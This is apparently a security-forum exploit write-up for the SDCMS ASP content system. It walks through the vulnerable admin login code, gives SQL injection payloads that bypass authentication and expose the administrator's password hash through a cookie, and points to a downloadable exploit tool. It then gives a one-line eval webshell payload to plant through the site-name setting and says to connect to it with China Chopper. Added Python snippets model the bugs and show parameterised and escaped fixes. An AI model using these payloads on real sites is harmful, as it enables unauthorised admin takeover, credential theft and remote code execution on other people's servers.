Author: T00LS 鬼哥
Vulnerable file: [admin directory]/index.asp
Sub Check
	Dim username,password,code,getcode,Rs
	IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub	'"submitting data from outside is forbidden"
	username=FilterText(Trim(Request.Form("username")),1)
	password=FilterText(Trim(Request.Form("password")),1)
	code=Trim(Request.Form("yzm"))
	getcode=Session("SDCMSCode")
	IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":Died	'"you are locked out for today"
	IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)":Died	'"captcha must not be empty"
	IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)":Died	'"captcha must be numeric"
	IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)":Died	'"wrong captcha"
	IF username="" or password="" Then
		Echo "用户名或密码不能为空":Died	'"username or password must not be empty"
	Else
		'username is concatenated straight into the Where clause; only the password goes through md5()
		Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
		IF Rs.Eof Then
			AddLog username,GetIp,"登录失败",1	'"login failed"
			Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"	'"wrong username or password, N attempts left today"
		Else
			Add_Cookies "sdcms_id",Rs(0)
			Add_Cookies "sdcms_name",username
			Add_Cookies "sdcms_pwd",Rs(2)	'the stored password hash of whichever row matched
			Add_Cookies "sdcms_admin",Rs(3)
			Add_Cookies "sdcms_alllever",Rs(4)
			Add_Cookies "sdcms_infolever",Rs(5)
			Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
			AddLog username,GetIp,"登录成功",1	'"login succeeded"
			'Automatically delete log records older than 30 days
			IF Sdcms_DataType Then
				Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
			Else
				Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
			End IF
			Go("sdcms_index.asp")
		End IF
		Rs.Close
		Set Rs=Nothing
	End IF
End Sub
We can see that username is filtered through FilterText. Let's look at the FilterText code:
Function FilterText(ByVal t0,ByVal t1)
	IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
	t0=Trim(t0)
	Select Case t1
	Case "1"
		t0=Replace(t0,Chr(32),"")
		t0=Replace(t0,Chr(13),"")
		t0=Replace(t0,Chr(10)&Chr(10),"")
		t0=Replace(t0,Chr(10),"")
	Case "2"
		t0=Replace(t0,Chr(8),"")'backspace
		t0=Replace(t0,Chr(9),"")'horizontal tab
		t0=Replace(t0,Chr(10),"")'line feed
		t0=Replace(t0,Chr(11),"")'vertical tab
		t0=Replace(t0,Chr(12),"")'form feed
		t0=Replace(t0,Chr(13),"")'carriage return (chr(13)&chr(10) is CRLF)
		t0=Replace(t0,Chr(22),"")
		t0=Replace(t0,Chr(32),"")'space
		t0=Replace(t0,Chr(33),"")'!
		t0=Replace(t0,Chr(34),"")'"
		t0=Replace(t0,Chr(35),"")'#
		t0=Replace(t0,Chr(36),"")'$
		t0=Replace(t0,Chr(37),"")'%
		t0=Replace(t0,Chr(38),"")'&
		t0=Replace(t0,Chr(39),"")''
		t0=Replace(t0,Chr(40),"")'(
		t0=Replace(t0,Chr(41),"")')
		t0=Replace(t0,Chr(42),"")'*
		t0=Replace(t0,Chr(43),"")'+
		t0=Replace(t0,Chr(44),"")',
		t0=Replace(t0,Chr(45),"")'-
		t0=Replace(t0,Chr(46),"")'.
		t0=Replace(t0,Chr(47),"")'/
		t0=Replace(t0,Chr(58),"")':
		t0=Replace(t0,Chr(59),"")';
		t0=Replace(t0,Chr(60),"")'<
		t0=Replace(t0,Chr(61),"")'=
		t0=Replace(t0,Chr(62),"")'>
		t0=Replace(t0,Chr(63),"")'?
		t0=Replace(t0,Chr(64),"")'@
		t0=Replace(t0,Chr(91),"")'[
		t0=Replace(t0,Chr(92),"")'\
		t0=Replace(t0,Chr(93),"")']
		t0=Replace(t0,Chr(94),"")'^
		t0=Replace(t0,Chr(95),"")'_
		t0=Replace(t0,Chr(96),"")'`
		t0=Replace(t0,Chr(123),"")'{
		t0=Replace(t0,Chr(124),"")'|
		t0=Replace(t0,Chr(125),"")'}
		t0=Replace(t0,Chr(126),"")'~
	Case Else
		'HTML-encode. The page rendered the entity names as bare characters; the
		'standard entities are restored here as the most likely original text.
		t0=Replace(t0, "&", "&amp;")
		t0=Replace(t0, "'", "&#39;")
		t0=Replace(t0, """", "&quot;")
		t0=Replace(t0, "<", "&lt;")
		t0=Replace(t0, ">", "&gt;")
	End Select
	IF Instr(Lcase(t0),"expression")>0 Then
		'breaks the CSS expression() keyword; the page rendered the entity as a soft hyphen
		t0=Replace(t0,"expression","e&shy;xpression", 1, -1, 0)
	End If
	FilterText=t0
End Function
See? With the parameter set to 1 it only strips the following:

	t0=Replace(t0,Chr(32),"")
	t0=Replace(t0,Chr(13),"")
	t0=Replace(t0,Chr(10)&Chr(10),"")
	t0=Replace(t0,Chr(10),"")

That is spaces, carriage returns and line feeds, and nothing else: the single quote, the = sign and the or keyword all pass straight through into the Where clause, so the username stays injectable as long as the payload needs no spaces. And because spaces are removed rather than rejected, a textbook admin' or '1'='1 simply collapses into admin'or'1'='1, which is still valid SQL.
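To make the failure concrete, here is an added example (not SDCMS code and not from the author): a Python model of FilterText's Case "1" branch and of the Sd_Admin lookup in Sub Check, run against a constructed in-memory SQLite table, with a bound-parameter version of the same query beside it. The table, the administrator account and its password are made up for the demonstration; Access/MSSQL tokenise these quoted literals the same way SQLite does, which is what the payloads rely on.

```python
# Added example (not SDCMS code): models FilterText(...,1) and the Sd_Admin lookup
# from Sub Check against a constructed SQLite table, then the parameterised fix.
import hashlib
import sqlite3


def filter_text_case1(t0: str) -> str:
    """Python rendering of the Case "1" branch: Trim, then strip space, CR, LF+LF, LF."""
    t0 = t0.strip()
    for ch in ("\x20", "\x0d", "\x0a\x0a", "\x0a"):
        t0 = t0.replace(ch, "")
    return t0


def md5(s: str) -> str:
    """Stand-in for the page's md5() helper (hex digest)."""
    return hashlib.md5(s.encode("utf-8")).hexdigest()


def make_db() -> sqlite3.Connection:
    """Constructed Sd_Admin table with one administrator; the credentials are made up."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE Sd_Admin (Id INTEGER, Sdcms_Name TEXT, Sdcms_Pwd TEXT,"
        " isadmin INTEGER, alllever TEXT, infolever TEXT)"
    )
    conn.execute("INSERT INTO Sd_Admin VALUES (1, 'admin', ?, 1, '', '')",
                 (md5("S3cret!pw"),))
    return conn


def build_query(username: str, password: str) -> str:
    """Exactly what Sub Check does: filter both fields, hash the password,
    and concatenate the username into the Where clause without escaping."""
    u = filter_text_case1(username)
    p = filter_text_case1(password)
    return ("SELECT Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever FROM Sd_Admin"
            " WHERE Sdcms_Name='" + u + "' AND Sdcms_Pwd='" + md5(p) + "'")


def login_vulnerable(conn, username, password):
    """Returns the matched row (the sdcms_* cookies are filled from it), or None."""
    return conn.execute(build_query(username, password)).fetchone()


def login_fixed(conn, username, password):
    """Same query with bound parameters: the username can only ever be a value."""
    sql = ("SELECT Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever FROM Sd_Admin"
           " WHERE Sdcms_Name=? AND Sdcms_Pwd=?")
    return conn.execute(sql, (username.strip(), md5(password.strip()))).fetchone()


if __name__ == "__main__":
    db = make_db()
    # Spaces are stripped, not rejected, so the textbook payload survives the filter;
    # the second payload needs no account name at all and matches every row.
    for user in ("admin' or '1'='1", "'or'1'='1'or'1'='1"):
        print(build_query(user, "wrong"))
        print("vulnerable:", login_vulnerable(db, user, "wrong"))
        print("fixed:     ", login_fixed(db, user, "wrong"))
```

Run stand-alone it prints both concatenated queries and the rows they return: the vulnerable path hands back the administrator's row, including the Sdcms_Pwd hash that Sub Check copies into the sdcms_pwd cookie, for either payload and a wrong password, while the bound-parameter version returns None for both and only succeeds with the real password.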
The vulnerability lets you walk straight into the backend: an injected username matches an administrator row without knowing the password, and the login handler then drops that row's stored password hash (Rs(2)) into the sdcms_pwd cookie, so you get the admin account's credentials as well. The default SDCMS backend path is /admin/; if the webmaster has changed it, find it yourself!
Exploit tool download (this tool only runs on XP): sdcms-EXP
Test:

Now enter the captcha shown in the tool and click OK.

See, we're straight into the admin management interface, heh!

That's it, straight into the backend....
SDCMS privilege escalation (from admin panel to webshell):

Method 1: open /[admin directory]/sdcms_set.asp and append ":eval(request(Chr(63)))' to the 网站名称 (site name) field. That alone writes a one-line shell straight into /inc/Const.asp. The one-liner's connection password is ? (Chr(63)).

OK, now connect to it with Caidao (China Chopper)!
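Why those three characters do the job, as an added example (not SDCMS code and not from the author): sdcms_set.asp writes the site name into a line of VBScript in /inc/Const.asp, so the value is spliced into code, not data. The template line used below (Const Sdcms_SiteName="...") is an assumption, since the real layout of Const.asp is not shown on this page; the payload is the one from the write-up. A small lexer that follows VBScript's string rules (a doubled quote inside a literal is an escaped quote, an apostrophe outside one starts a comment) shows which part of the written line ends up executable, and the doubled-quote escaping that keeps the value inside the literal.

```python
# Added example (not SDCMS code): models the config write behind Method 1 with an
# ASSUMED template line, and checks whether the written value becomes code.
PAYLOAD = '":eval(request(Chr(63)))\''   # payload from the write-up; Chr(63) is '?'

TEMPLATE_PREFIX = "Const Sdcms_SiteName="   # assumption: real Const.asp layout is not on the page


def render_naive(site_name: str) -> str:
    """The bug as described: the value is spliced into a code line unescaped."""
    return TEMPLATE_PREFIX + '"' + site_name + '"'


def vbs_string_literal(value: str) -> str:
    """Safe VBScript literal: double every quote. CR/LF cannot be escaped inside a
    VBScript string literal, so newlines are rejected instead of written out."""
    if "\r" in value or "\n" in value:
        raise ValueError("newline would terminate the statement")
    return '"' + value.replace('"', '""') + '"'


def render_fixed(site_name: str) -> str:
    """Hardened write: same template, value emitted as a proper literal."""
    return TEMPLATE_PREFIX + vbs_string_literal(site_name)


def code_outside_strings(line: str) -> str:
    """Return the characters of `line` that VBScript would treat as code: everything
    outside string literals and before a comment. Inside a literal, "" is an
    escaped quote, so it does not terminate the string."""
    out, i, n, in_str = [], 0, len(line), False
    while i < n:
        c = line[i]
        if in_str:
            if c == '"':
                if i + 1 < n and line[i + 1] == '"':
                    i += 2          # escaped quote, still inside the literal
                    continue
                in_str = False      # closing quote
        elif c == '"':
            in_str = True
        elif c == "'":
            break                   # comment: the rest of the line is not code
        else:
            out.append(c)
        i += 1
    return "".join(out)


def value_escapes_literal(line: str) -> bool:
    """True when the written line contains executable code beyond the template's own."""
    return code_outside_strings(line).strip() != TEMPLATE_PREFIX


if __name__ == "__main__":
    for render in (render_naive, render_fixed):
        line = render(PAYLOAD)
        verdict = "SHELL" if value_escapes_literal(line) else "just a string"
        print(line, "->", verdict)
```

With the naive write the line becomes Const Sdcms_SiteName="":eval(request(Chr(63)))'" : the leading quote closes an empty literal, the colon starts a new statement, eval(request("?")) runs whatever arrives in the ? parameter, and the apostrophe comments out the template's trailing quote. The escaped write produces Const Sdcms_SiteName=""":eval(request(Chr(63)))'" , where every character of the payload sits inside one string literal and nothing new executes.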